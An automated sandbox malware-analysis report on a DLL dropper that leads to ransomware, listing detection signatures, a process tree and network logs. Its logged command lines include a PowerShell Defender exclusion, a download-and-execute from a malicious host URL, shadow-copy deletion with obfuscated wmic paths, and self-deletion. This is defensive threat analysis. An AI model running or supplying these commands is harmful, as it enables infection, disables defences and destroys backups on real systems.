Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TD2HjoogPx.dll

Overview

General Information

Sample name:TD2HjoogPx.dll
renamed because original name is a hash value
Original sample name:fccd129f6a5b9d2133d14922a3614f02.dll
Analysis ID:1575339
MD5:fccd129f6a5b9d2133d14922a3614f02
SHA1:e814c637e6f0c21f3aa9b43fb92cb161b4d451fc
SHA256:4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e
Tags:dlluser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Delete shadow copy via WMIC
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7876 cmdline: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7972 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7984 cmdline: rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 8060 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8112 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 7532 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 768 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3352 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 4128 cmdline: cmd /c %temp%/eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8044 cmdline: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • powershell.exe (PID: 8068 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 6056 cmdline: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • powershell.exe (PID: 1548 cmdline: powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5272 cmdline: cmd /c %temp%/eryy65ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • eryy65ty.exe (PID: 6860 cmdline: C:\Users\user\AppData\Local\Temp/eryy65ty.exe MD5: 9049FABA5517305C44BD5F28398FB6B9)
        • WMIC.exe (PID: 332 cmdline: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • eryy65ty.exe (PID: 2332 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9)
    • WMIC.exe (PID: 7980 cmdline: c:\xGRceo\xGRc\..\..\Windows\xGRc\xGRc\..\..\system32\xGRc\xGRc\..\..\wbem\xGRc\xGRce\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6480 cmdline: c:\klzShx\klzS\..\..\Windows\klzS\klzS\..\..\system32\klzS\klzS\..\..\wbem\klzS\klzSh\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6272 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 316 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • eryy65ty.exe (PID: 4492 cmdline: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9)
    • WMIC.exe (PID: 4656 cmdline: c:\ZiHrdF\ZiHr\..\..\Windows\ZiHr\ZiHr\..\..\system32\ZiHr\ZiHr\..\..\wbem\ZiHr\ZiHrd\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6552 cmdline: c:\NTdKVj\NTdK\..\..\Windows\NTdK\NTdK\..\..\system32\NTdK\NTdK\..\..\wbem\NTdK\NTdKV\..\..\wmic.exe shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 708 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 4296 cmdline: ping 1.1.1.1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • notepad.exe (PID: 5084 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
No yara matches

Operating System Destruction

barindex
Source: Process startedAuthor: Joe Security: Data: Command: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 6860, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, ProcessId: 332, ProcessName: WMIC.exe

System Summary

barindex
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 7876, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 8044, ProcessName: cmd.exe
Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\eryy65ty.exep.p.dQ.s.CdQp..F.....V...W..$.... "#(...."Hs..8..sc..S..i"..#Xs.,s..L...S.}..s.s.s.s.s.....s......s....s....sJ..li,sr...<sE.........i<.<.Y.s.s....Ls)VY.V.s^EY..YXs.sF.+.s.E...G<.Y, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 6860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 7876, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 8044, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 6860, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, ProcessId: 332, ProcessName: WMIC.exe
Source: Process startedAuthor: Ilya Krestinichev: Data: Command: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", CommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\eryy65ty.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 2332, ParentProcessName: eryy65ty.exe, ProcessCommandLine: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe", ProcessId: 6272, ProcessName: cmd.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\eryy65ty.exep.p.dQ.s.CdQp..F.....V...W..$.... "#(...."Hs..8..sc..S..i"..#Xs.,s..L...S.}..s.s.s.s.s.....s......s....s....sJ..li,sr...<sE.........i<.<.Y.s.s....Ls)VY.V.s^EY..YXs.sF.+.s.E...G<.Y, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 6860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW
Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp/eryy65ty.exe, ParentImage: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ParentProcessId: 6860, ParentProcessName: eryy65ty.exe, ProcessCommandLine: c:\SYeXIP\SYeX\..\..\Windows\SYeX\SYeX\..\..\system32\SYeX\SYeX\..\..\wbem\SYeX\SYeXI\..\..\wmic.exe shadowcopy delete, ProcessId: 332, ProcessName: WMIC.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, CommandLine: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 7876, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, ProcessId: 6056, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 7876, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 8044, ProcessName: cmd.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\eryy65ty.exe, ProcessId: 2332, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, CommandLine: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 7876, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, ProcessId: 6056, ProcessName: cmd.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8044, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", ProcessId: 8068, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://kiltone.top/stelin/Gosjeufon.cplAvira URL Cloud: Label: malware
Source: https://kiltone.top/stelin/Gosjeufon.cplVirustotal: Detection: 11%Perma Link
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeVirustotal: Detection: 66%Perma Link
Source: TD2HjoogPx.dllVirustotal: Detection: 44%Perma Link
Source: TD2HjoogPx.dllReversingLabs: Detection: 36%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E784E0 __Mtx_unlock,__Mtx_init_in_situ,BCryptGenRandom,BCryptCloseAlgorithmProvider,SetLastError,20_2_00E784E0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E785F0 BCryptGenRandom,BCryptCloseAlgorithmProvider,20_2_00E785F0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E77EE0 BCryptOpenAlgorithmProvider,SetLastError,___std_exception_copy,20_2_00E77EE0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E78020 GetLastError,BCryptCloseAlgorithmProvider,20_2_00E78020
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E783F0 BCryptCloseAlgorithmProvider,20_2_00E783F0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E78420 BCryptGenRandom,SetLastError,20_2_00E78420
Source: TD2HjoogPx.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.67.168:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: TD2HjoogPx.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: Z:\scvhost\Release\scvhost.pdb source: eryy65ty.exe, 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 00000014.00000000.1580004166.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001B.00000000.1754914879.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001E.00000000.1837388986.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe.14.dr
Source: Binary string: Z:\lderd\Release\lderd.pdb source: loaddll32.exe, 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp, TD2HjoogPx.dll
Source: Binary string: Z:\scvhost\Release\scvhost.pdbd source: eryy65ty.exe, 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 00000014.00000000.1580004166.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001B.00000000.1754914879.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001E.00000000.1837388986.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe.14.dr
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D419B85 FindFirstFileExA,0_2_6D419B85
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E3DF60 IsDebuggerPresent,GetLastError,FindFirstFileW,GetLastError,GetLastError,GetLastError,CopyFileA,Sleep,FindNextFileW,GetLastError,FindClose,20_2_00E3DF60
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00EAAB8F FindFirstFileExA,20_2_00EAAB8F
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\wtr\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\Jump to behavior

Networking

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: Joe Sandbox ViewASN Name: TELE-ASTeleAsiaLimitedHK TELE-ASTeleAsiaLimitedHK
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /stelin/Gosjeufon.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kiltone.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /stelin/Gosjeufon.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kiltone.topConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /stelin/Gosjeufon.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kiltone.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /stelin/Gosjeufon.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kiltone.topConnection: Keep-Alive
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: kiltone.top
Source: cert9.db.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cert9.db.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: cert9.db.27.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: cert9.db.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cert9.db.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cert9.db.27.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cert9.db.27.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: cert9.db.27.drString found in binary or memory: http://ocsp.digicert.com0
Source: cert9.db.27.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: cert9.db.27.drString found in binary or memory: http://x1.c.lencr.org/0
Source: cert9.db.27.drString found in binary or memory: http://x1.i.lencr.org/0
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://MD8.mozilla.org/1/m
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://account.bellmedia.c
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://allegro.pl/
Source: 3870112724rsegmnoittet-es.sqlite.27.drString found in binary or memory: https://bugzilla.mo
